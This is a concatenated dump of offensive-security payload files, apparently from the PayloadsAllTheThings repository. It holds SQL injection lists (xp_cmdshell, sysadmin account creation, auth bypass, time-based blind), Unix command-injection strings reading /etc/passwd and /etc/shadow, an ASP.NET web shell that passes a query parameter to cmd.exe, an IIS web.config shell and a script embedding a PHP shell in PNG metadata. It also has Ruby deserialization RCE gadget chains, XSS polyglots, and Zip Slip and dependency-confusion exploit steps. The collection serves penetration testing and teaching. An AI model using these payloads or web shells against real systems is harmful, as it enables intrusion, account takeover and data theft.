software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the 
Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL.txt: -------------------------------------------------------------------------------- 1 | # you will need to customize/modify some of the vaules in the queries for best effect 2 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 3 | 'create user name identified by 'pass123' -- 4 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 5 | ' ; drop table temp -- 6 | 'exec sp_addlogin 'name' , 'password' -- 7 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 8 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 9 | ' grant connect to name; grant resource to name; -- 10 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 11 | ' or 1=1 -- 12 | ' union (select @@version) -- 13 | ' union (select NULL, (select @@version)) -- 14 | ' union (select NULL, NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 17 | ' union 
(select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 18 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/Build_image_to_LFI.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from PIL import Image 3 | 4 | # Shellcodes - Bypass included : Keyword Recognition : System, GET, php 5 | # --- How to use : http://localhost/shell.php?c=echo%20'
';ls
 6 | 
 7 | #shellcode  = ""
 9 | # --- How to use : http://localhost/shell.php?_=system&__=echo%20'
';ls
10 | shellcode2 = ";').($_^'/');?>"
11 | 
12 | 
13 | print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file")
14 | 
15 | # Create a backdoored PNG
16 | print(" - Creating a payload.png")
17 | im = Image.new("RGB", (10,10), "Black")  # 10x10 solid RGB image: the pixels are a placeholder, the string is carried in metadata (see save below)
18 | im.info["shell"] = shellcode  # NOTE(review): `shellcode` is assigned on a line lost from this listing (line 8) - confirm against the original file; `shellcode2` (line 10) is never used here
19 | reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')  # info keys that describe PNG structure rather than free text; these are never copied into text chunks
20 | 
21 | # undocumented class
22 | from PIL import PngImagePlugin
23 | meta = PngImagePlugin.PngInfo()  # container for the text chunks written next to the pixel data
24 | 
25 | # copy metadata into new object
26 | for k,v in im.info.items():
27 | 	if k in reserved: continue
28 | 	meta.add_text(k, v, 0)  # third argument 0 = no zlib compression, so the value is stored as a plain tEXt chunk
29 | im.save("payload.png", "PNG", pnginfo=meta)  # NOTE(review): the string survives only as a text chunk - an upload pipeline that re-encodes images without pnginfo (or strips tEXt/zTXt/iTXt chunks) discards it; that is the server-side control to verify
30 | 
31 | print("Done")


--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | # CONTRIBUTING
 2 | 
 3 | PayloadsAllTheThings' Team :heart: pull requests :)
 4 | Feel free to improve the project with your payloads and techniques!
 5 | 
 6 | You can also contribute with a :beers: IRL, or using the sponsor button.
 7 | 
 8 | ## Techniques Folder
 9 | 
10 | Every section should contain the following files; you can use the `_template_vuln` folder to create a new technique folder:
11 | 
12 | README.md - vulnerability description and how to exploit it, including several payloads (format described below)
13 | - Intruder - a set of files to give to Burp Intruder
14 | - Images - pictures for the README.md
15 | - Files - some files referenced in the README.md
16 | 
17 | ## README.md format
18 | 
19 | Use the following example to create a new technique `README.md` file.
20 | 
21 | ```markdown
22 | # Vulnerability Title
23 | 
24 | > Vulnerability description
25 | 
26 | ## Summary
27 | 
28 | * [Tools](#tools)
29 | * [Something](#something)
30 |   * [Subentry 1](#sub1)
31 |   * [Subentry 2](#sub2)
32 | * [References](#references)
33 | 
34 | ## Tools
35 | 
36 | - [Tool 1](https://example.com)
37 | - [Tool 2](https://example.com)
38 | 
39 | ## Something
40 | 
41 | Quick explanation
42 | 
43 | ## References
44 | 
45 | - [Blog title - Author, Date](https://example.com)
46 | ```
47 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration IIS web.config/web.config:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 |    
 4 |       
 5 |          
 6 |       
 7 |       
 8 |          
 9 |             
10 |                
11 |             
12 |             
13 |                
14 |             
15 |          
16 |       
17 |    
18 |    
19 | 
20 | 
21 | ")
23 | Response.write("

24 |
")

25 |

Set wShell1 = CreateObject("WScript.Shell") 26 | Set cmd1 = wShell1.Exec("whoami") 27 | output1 = cmd1.StdOut.Readall() 28 | set cmd1 = nothing: Set wShell1 = nothing

29 |

Response.write(output1) 30 | Response.write("

31 |

32 | –> 33 | 34 | -------------------------------------------------------------------------------- /Upload Insecure Files/Zip Slip/README.md: -------------------------------------------------------------------------------- 1 | # Zip Slip 2 | 3 | > The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. 4 | 5 | ## Summary 6 | 7 | - [Detection](#detection) 8 | - [Tools](#tools) 9 | * [Exploits](#exploits) 10 | * [Basic Exploit](#basic-exploit) 11 | - [Additional Notes](#additional-notes) 12 | 13 | ## Detection 14 | 15 | - Any zip upload page on the application 16 | 17 | ## Tools 18 | 19 | - evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc) 20 | 21 | ## Exploits 22 | 23 | ### Basic Exploit 24 | 25 | ```python 26 | python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15 27 | ``` 28 | 29 | ### Additional Notes 30 | - For affected libraries and projects, visit https://github.com/snyk/zip-slip-vulnerability 31 | 32 | ## References 33 | 34 | - [Zip Slip Vulnerability - Snyk Ltd, 2019](https://snyk.io/research/zip-slip-vulnerability) 35 | - [Zip Slip - snyk, 2019](https://github.com/snyk/zip-slip-vulnerability) 36 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt: -------------------------------------------------------------------------------- 1 | 
waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- -------------------------------------------------------------------------------- /SQL Injection/Intruder/SQL-Injection: -------------------------------------------------------------------------------- 1 | ' 2 | '' 3 | ` 4 | `` 5 | , 6 | " 7 | "" 8 | / 9 | // 10 | \ 11 | \\ 12 | ; 13 | ' or " 14 | -- or # 15 | ' OR '1 16 | ' OR 1 -- - 17 | " OR "" = " 18 | " OR 1 = 1 -- - 19 | ' OR '' = ' 20 | '=' 21 | 'LIKE' 22 | '=0--+ 23 | OR 1=1 24 | ' OR 'x'='x 25 | ' AND id IS NULL; -- 26 | '''''''''''''UNION SELECT '2 27 | %00 28 | /*…*/ 29 | + addition, concatenate (or space in url) 30 | || 
(double pipe) concatenate 31 | % wildcard attribute indicator 32 | @variable local variable 33 | @@variable global variable 34 | # Numeric 35 | AND 1 36 | AND 0 37 | AND true 38 | AND false 39 | 1-false 40 | 1-true 41 | 1*56 42 | -2 43 | 1' ORDER BY 1--+ 44 | 1' ORDER BY 2--+ 45 | 1' ORDER BY 3--+ 46 | 1' ORDER BY 1,2--+ 47 | 1' ORDER BY 1,2,3--+ 48 | 1' GROUP BY 1,2,--+ 49 | 1' GROUP BY 1,2,3--+ 50 | ' GROUP BY columnnames having 1=1 -- 51 | -1' UNION SELECT 1,2,3--+ 52 | ' UNION SELECT sum(columnname ) from tablename -- 53 | -1 UNION SELECT 1 INTO @,@ 54 | -1 UNION SELECT 1 INTO @,@,@ 55 | 1 AND (SELECT * FROM Users) = 1 56 | ' AND MID(VERSION(),1,1) = '5'; 57 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- 58 | Finding the table name 59 | Time-Based: 60 | ,(select * from (select(sleep(10)))a) 61 | %2c(select%20*%20from%20(select(sleep(10)))a) 62 | ';WAITFOR DELAY '0:0:30'-- 63 | Comments: 64 | # Hash comment 65 | /* C-style comment 66 | -- - SQL comment 67 | ;%00 Nullbyte 68 | ` Backtick 69 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/payloads-sql-blind-MSSQL-WHERE: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay 
'0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- 41 | -------------------------------------------------------------------------------- /Dependency Confusion/README.md: -------------------------------------------------------------------------------- 1 | # Dependency Confusion 2 | 3 | > A dependency confusion attack or supply chain substitution attack occurs when a software installer script is tricked into pulling a malicious code file from a public repository instead of the intended file of the same name from an internal repository. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Exploit](#exploitation) 9 | * [References](#references) 10 | 11 | ## Exploit 12 | 13 | Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used. 14 | 15 | ### NPM example 16 | 17 | * List all the packages (ie: package.json, composer.json, ...) 
18 | * Find the package missing from https://www.npmjs.com/ 19 | * Register and create a **public** package with the same name 20 | * Package example : https://github.com/0xsapra/dependency-confusion-expoit 21 | 22 | ## References 23 | 24 | * [Exploiting Dependency Confusion - 2 Jul 2021 - 0xsapra](https://0xsapra.github.io/website//Exploiting-Dependency-Confusion) 25 | * [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) 26 | * [Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/) -------------------------------------------------------------------------------- /SQL Injection/Intruder/Auth_Bypass.txt: -------------------------------------------------------------------------------- 1 | '-' 2 | ' ' 3 | '&' 4 | '^' 5 | '*' 6 | ' or ''-' 7 | ' or '' ' 8 | ' or ''&' 9 | ' or ''^' 10 | ' or ''*' 11 | "-" 12 | " " 13 | "&" 14 | "^" 15 | "*" 16 | " or ""-" 17 | " or "" " 18 | " or ""&" 19 | " or ""^" 20 | " or ""*" 21 | or true-- 22 | " or true-- 23 | ' or true-- 24 | ") or true-- 25 | ') or true-- 26 | ' or 'x'='x 27 | ') or ('x')=('x 28 | ')) or (('x'))=(('x 29 | " or "x"="x 30 | ") or ("x")=("x 31 | ")) or (("x"))=(("x 32 | or 1=1 33 | or 1=1-- 34 | or 1=1# 35 | or 1=1/* 36 | admin' -- 37 | admin' # 38 | admin'/* 39 | admin' or '1'='1 40 | admin' or '1'='1'-- 41 | admin' or '1'='1'# 42 | admin' or '1'='1'/* 43 | admin'or 1=1 or ''=' 44 | admin' or 1=1 45 | admin' or 1=1-- 46 | admin' or 1=1# 47 | admin' or 1=1/* 48 | admin') or ('1'='1 49 | admin') or ('1'='1'-- 50 | admin') or ('1'='1'# 51 | admin') or ('1'='1'/* 52 | admin') or '1'='1 53 | admin') or '1'='1'-- 54 | admin') or '1'='1'# 55 | admin') or '1'='1'/* 56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 57 | admin" -- 58 | admin" 
# 59 | admin"/* 60 | admin" or "1"="1 61 | admin" or "1"="1"-- 62 | admin" or "1"="1"# 63 | admin" or "1"="1"/* 64 | admin"or 1=1 or ""=" 65 | admin" or 1=1 66 | admin" or 1=1-- 67 | admin" or 1=1# 68 | admin" or 1=1/* 69 | admin") or ("1"="1 70 | admin") or ("1"="1"-- 71 | admin") or ("1"="1"# 72 | admin") or ("1"="1"/* 73 | admin") or "1"="1 74 | admin") or "1"="1"-- 75 | admin") or "1"="1"# 76 | admin") or "1"="1"/* 77 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 78 | -------------------------------------------------------------------------------- /Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php: -------------------------------------------------------------------------------- 1 | 33 | -------------------------------------------------------------------------------- /Insecure Deserialization/Files/Ruby_universal_gadget_generate_verify.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | class Gem::StubSpecification 4 | def initialize; end 5 | end 6 | 7 | 8 | stub_specification = Gem::StubSpecification.new 9 | stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2") 10 | 11 | puts "STEP n" 12 | stub_specification.name rescue nil 13 | puts 14 | 15 | 16 | class Gem::Source::SpecificFile 17 | def initialize; end 18 | end 19 | 20 | specific_file = Gem::Source::SpecificFile.new 21 | specific_file.instance_variable_set(:@spec, stub_specification) 22 | 23 | other_specific_file = Gem::Source::SpecificFile.new 24 | 25 | puts "STEP n-1" 26 | specific_file <=> other_specific_file rescue nil 27 | puts 28 | 29 | 30 | $dependency_list= Gem::DependencyList.new 31 | $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file]) 32 | 33 | puts "STEP n-2" 34 | $dependency_list.each{} rescue nil 35 | puts 36 | 37 | 38 | class Gem::Requirement 39 | def marshal_dump 40 | [$dependency_list] 41 | end 42 | end 43 | 44 | payload = 
Marshal.dump(Gem::Requirement.new) 45 | 46 | puts "STEP n-3" 47 | Marshal.load(payload) rescue nil 48 | puts 49 | 50 | 51 | puts "VALIDATION (in fresh ruby process):" 52 | IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe| 53 | pipe.print payload 54 | pipe.close_write 55 | puts pipe.gets 56 | puts 57 | end 58 | 59 | puts "Payload (hex):" 60 | puts payload.unpack('H*')[0] 61 | puts 62 | 63 | 64 | require "base64" 65 | puts "Payload (Base64 encoded):" 66 | puts Base64.encode64(payload) -------------------------------------------------------------------------------- /Insecure Deserialization/Ruby.md: -------------------------------------------------------------------------------- 1 | # Ruby Deserialization 2 | 3 | ## Marshal.load 4 | 5 | Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5 6 | 7 | ```ruby 8 | for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done 9 | ``` 10 | 11 | ## Yaml.load 12 | 13 | Vulnerable code 14 | ```ruby 15 | require "yaml" 16 | YAML.load(File.read("p.yml")) 17 | ``` 18 | 19 | Exploitation code 20 | ```ruby 21 | --- !ruby/object:Gem::Requirement 22 | requirements: 23 | !ruby/object:Gem::DependencyList 24 | specs: 25 | - !ruby/object:Gem::Source::SpecificFile 26 | spec: &1 !ruby/object:Gem::StubSpecification 27 | loaded_from: "|id 1>&2" 28 | - !ruby/object:Gem::Source::SpecificFile 29 | spec: 30 | ``` 31 | 32 | 33 | ## References 34 | 35 | - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) 36 | - 
[Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) 37 | - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) -------------------------------------------------------------------------------- /SQL Injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY: -------------------------------------------------------------------------------- 1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 17 | 
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 19 | -------------------------------------------------------------------------------- /Command Injection/Intruder/command-execution-unix.txt: -------------------------------------------------------------------------------- 1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> 2 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> 3 | <!--#exec%20cmd="/usr/bin/id;--> 4 | <!--#exec%20cmd="/usr/bin/id;--> 5 | /index.html|id| 6 | ";id;" 7 | ';id;' 8 | ;id; 9 | ;id 10 | ;netstat -a; 11 | "|id|" 12 | '|id|' 13 | |id 14 | |/usr/bin/id 15 | |id| 16 | "|/usr/bin/id|" 17 | '|/usr/bin/id|' 18 | |/usr/bin/id| 19 | "||/usr/bin/id|" 20 | '||/usr/bin/id|' 21 | ||/usr/bin/id| 22 | |id; 23 | ||/usr/bin/id; 24 | ;id| 25 | ;|/usr/bin/id| 26 | "\n/bin/ls -al\n" 27 | '\n/bin/ls -al\n' 28 | \n/bin/ls -al\n 29 | \n/usr/bin/id\n 30 | \nid\n 31 | \n/usr/bin/id; 32 | \nid; 33 | \n/usr/bin/id| 34 | \nid| 35 | ;/usr/bin/id\n 36 | ;id\n 37 | |usr/bin/id\n 38 | |nid\n 39 | `id` 40 | `/usr/bin/id` 41 | a);id 42 | a;id 43 | a);id; 44 | a;id; 45 | a);id| 46 | a;id| 47 | a)|id 48 | a|id 49 | a)|id; 50 | a|id 51 | |/bin/ls -al 52 | a);/usr/bin/id 53 | a;/usr/bin/id 54 | a);/usr/bin/id; 55 | a;/usr/bin/id; 56 | a);/usr/bin/id| 57 | a;/usr/bin/id| 58 | a)|/usr/bin/id 59 | a|/usr/bin/id 60 | a)|/usr/bin/id; 61 | a|/usr/bin/id 62 | ;system('cat%20/etc/passwd') 63 | ;system('id') 64 | ;system('/usr/bin/id') 65 | %0Acat%20/etc/passwd 66 | %0A/usr/bin/id 67 | %0Aid 68 | %22%0A/usr/bin/id%0A%22 69 | %27%0A/usr/bin/id%0A%27 70 | %0A/usr/bin/id%0A 71 | %0Aid%0A 72 | "& ping -i 30 127.0.0.1 &" 73 | '& ping -i 30 127.0.0.1 &' 74 | & ping -i 30 127.0.0.1 & 75 | & ping -n 30 127.0.0.1 & 76 | %0a ping -i 30 127.0.0.1 %0a 77 | `ping 127.0.0.1` 78 | | id 79 | & id 80 | ; id 81 | %0a id %0a 82 | `id` 83 | $;/usr/bin/id 84 | 
-------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.ashx: -------------------------------------------------------------------------------- 1 | <% @ webhandler language="C#" class="AverageHandler" %> 2 | 3 | using System; 4 | using System.Web; 5 | using System.Diagnostics; 6 | using System.IO; 7 | 8 | public class AverageHandler : IHttpHandler 9 | { 10 | /* .Net requires this to be implemented */ 11 | public bool IsReusable 12 | { 13 | get { return true; } 14 | } 15 | 16 | /* main executing code */ 17 | public void ProcessRequest(HttpContext ctx) 18 | { 19 | Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl); 20 | string command = HttpUtility.ParseQueryString(url.Query).Get("cmd"); 21 | 22 | ctx.Response.Write("

Command:
"); 23 | ctx.Response.Write("
"); 24 | ctx.Response.Write("
");
25 | 
26 |     /* command execution and output retrieval */
    /* `command` is the raw value of the "cmd" query-string parameter parsed earlier in
       ProcessRequest (outside this span); it is concatenated onto "cmd.exe /c" with no
       validation or allow-list, which is what makes this .ashx handler a web shell.
       From the defender's side: an upload filter that blocks .asp/.aspx but not .ashx
       still lets this execute, and the host-side signal is the IIS worker process
       spawning cmd.exe. */
27 |     ProcessStartInfo psi = new ProcessStartInfo();
28 |     psi.FileName = "cmd.exe";
29 |     psi.Arguments = "/c "+command;
30 |     psi.RedirectStandardOutput = true;
    /* Only stdout is redirected; stderr is left alone, so errors from the child never
       reach the response. */
31 |     psi.UseShellExecute = false;
32 |     Process p = Process.Start(psi);
    /* NOTE(review): p is never disposed and WaitForExit is not called; ReadToEnd below
       returns once the child closes its stdout. */
33 |     StreamReader stmrdr = p.StandardOutput;
34 |     string s = stmrdr.ReadToEnd();
35 |     stmrdr.Close();
36 | 
    /* The captured output is HTML-encoded before it is written, so the command's own
       output cannot inject markup into the page. */
37 |     ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
38 |     ctx.Response.Write("
"); 39 | ctx.Response.Write("
"); 40 | ctx.Response.Write("By @Hypn, for educational purposes only."); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /XSS Injection/Intruders/xss_payloads_quick.txt: -------------------------------------------------------------------------------- 1 | javascript:alert(1)//INJECTX 2 | //INJECTX 3 | //INJECTX 4 | //INJECTX 5 | INJECTX HOVER 6 | onmouseover="document.cookie=true;">//INJECTX 7 | alert(1)>//INJECTX 8 |

INJECTX

9 | 10 | //INJECTX 11 | 12 |

a//INJECTX 18 | 19 |

a 20 | 21 | 22 | 23 | //INJECTX 35 | //INJECTX 36 | //INJECTX 37 | \x3csVg/\x3e 2 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> 3 | “ onclick=alert(1)//">

<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> 5 | javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* 6 | javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a 7 | javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ 8 | javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* 9 | javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* 10 | javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// 11 | javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* 12 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* 13 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* 14 | javascript://--></title></style></textarea></script><svg "//' onclick=alert()// 15 | /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* 16 | -------------------------------------------------------------------------------- /XSS Injection/Intruders/0xcela_event_handlers.txt: -------------------------------------------------------------------------------- 1 | FSCommand 2 | onAbort 3 | onActivate 4 | onAfterPrint 5 | onAfterUpdate 6 | onBeforeActivate 7 | onBeforeCopy 8 | onBeforeCut 9 | onBeforeDeactivate 10 | onBeforeEditFocus 11 | onBeforePaste 12 | onBeforePrint 13 | onBeforeUnload 14 | onBeforeUpdate 15 | onBegin 16 | onBlur 17 | onBounce 18 | onCellChange 19 | onChange 20 | onClick 21 | onContextMenu 22 | onControlSelect 23 | onCopy 24 | onCut 25 | onDataAvailable 26 | onDataSetChanged 27 | onDataSetComplete 28 | onDblClick 29 | onDeactivate 30 | onDrag 31 | onDragDrop 32 | onDragEnd 33 | 
